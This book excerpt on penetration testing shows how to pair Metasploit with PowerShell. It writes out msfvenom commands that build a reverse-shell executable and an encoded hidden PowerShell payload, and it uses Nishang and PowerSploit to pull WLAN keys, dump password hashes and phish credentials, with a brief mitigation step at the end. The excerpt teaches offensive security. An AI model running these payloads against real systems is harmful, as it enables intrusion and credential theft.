PowerShell is a perfect tool for performing sophisticated attacks, and also, can be used side-by-side with the Metasploit Framework.
This article is an excerpt taken from the book Advanced Infrastructure Penetration Testing written by Chiheb Chebbi. In this book, you will learn advanced penetration testing techniques that will help you exploit databases, web and application servers, switches or routers, Docker, VLAN, VoIP, and VPN.
In today’s post, we will combine the flexibility of Metasploit and PowerShell. This combination is a great opportunity to perform more customized attacks and security tests.
PowerShell attacks are already integrated into Metasploit. You can check by using the search command:
msf> search powershell
Now it is time to learn how to use Metasploit with PowerShell. For a demonstration of one of the many uses, you can convert a PowerShell script into an executable file using the msfvenom utility:
>msfvenom -p windows/powershell_reverse_tcp LHOST=192.168.1.39 LPORT=4444 -f exe > evilPS.exe
>msfvenom -p windows/exec CMD=“powershell -ep bypass -W Hidden -enc [Powershell script Here]” -f exe -e x86/shikata_ga_nai -o /root/home/ghost/Desktop/power.exe
PowerSploit is an amazing set of PowerShell scripts used by information security professionals, and especially penetration testers. To download PowerSploit, you need to grab it from its official GitHub repository, https://github.com/PowerShellMafia/PowerSploit:
# git clone https://github.com/PowerShellMafia/PowerSploit
After cloning the project, use the ls command to list the files:
From the following screenshot, you can note that PowerSploit contains a lot of amazing scripts for performing a number of tasks, such as:
Nishang is a great collection of tools used to perform many tasks during all the penetration testing phases. You can get it from https://github.com/samratashok/nishang:
# git clone https://github.com/samratashok/nishang
As you can see from listing the downloaded project, Nishang is loaded with many various scripts and utilities for performing a lot of required tasks during penetration testing missions, such as:
You can explore all the available scripts by listing the content of Nishang project using the ls command:
Let’s explore some of Nishang’s script power on a Windows machine:
You can import all the modules using the Import-Module PowerShell cmdlet:
Oops, something went wrong! Don’t worry, in order to use the Import-Module, you need to open PowerShell as an administrator, and type Set-ExecutionPolicy -ExecutionPolicy RemoteSigned:
Then you can import the modules:
Now, if you want, for example, to use the Get-Information module, you just need to type Get-Information:
If you want to unveil WLAN keys, type Get-WLAN-Keys:
You can go further and dump password hashes from a target machine in a post-exploitation mission. Thanks to the Get-PassHashes module, you are able to dump password hashes. This is the output of it from my local machine:
However, if you want to pop the command after getting a shell, use:
Powershell.exe –exec bypass –Command “& {Import-Module '[PATH_HERE]/Get-PassHashes.ps1' , Get-PassHashes}”
You can even perform a phishing attack using Invoke-CredentialPhish, like in the previous demonstration. You can run this attack on the victim’s machine:
In the previous sections, we went through various techniques for attacking machines using Metasploit and PowerShell. Now it is time to learn how to defend against and mitigate PowerShell attacks. In order to protect against PowerShell attacks, you need to:
PS C:Windowssystem32> [environment]::SetEnvironmentVariable('__PSLockdownPolicy', '4', 'Machine')
$ExecutionContext.SessionState.LanguageMode
Pentest tool in focus: Metasploit
I remember deciding to pursue my first IT certification, the CompTIA A+. I had signed…
Key takeaways The transformer architecture has proved to be revolutionary in outperforming the classical RNN…
Once we learn how to deploy an Ubuntu server, how to manage users, and how…
Key-takeaways: Clean code isn’t just a nice thing to have or a luxury in software projects; it's a necessity. If we…
While developing a web application, or setting dynamic pages and meta tags we need to deal with…
Software architecture is one of the most discussed topics in the software industry today, and…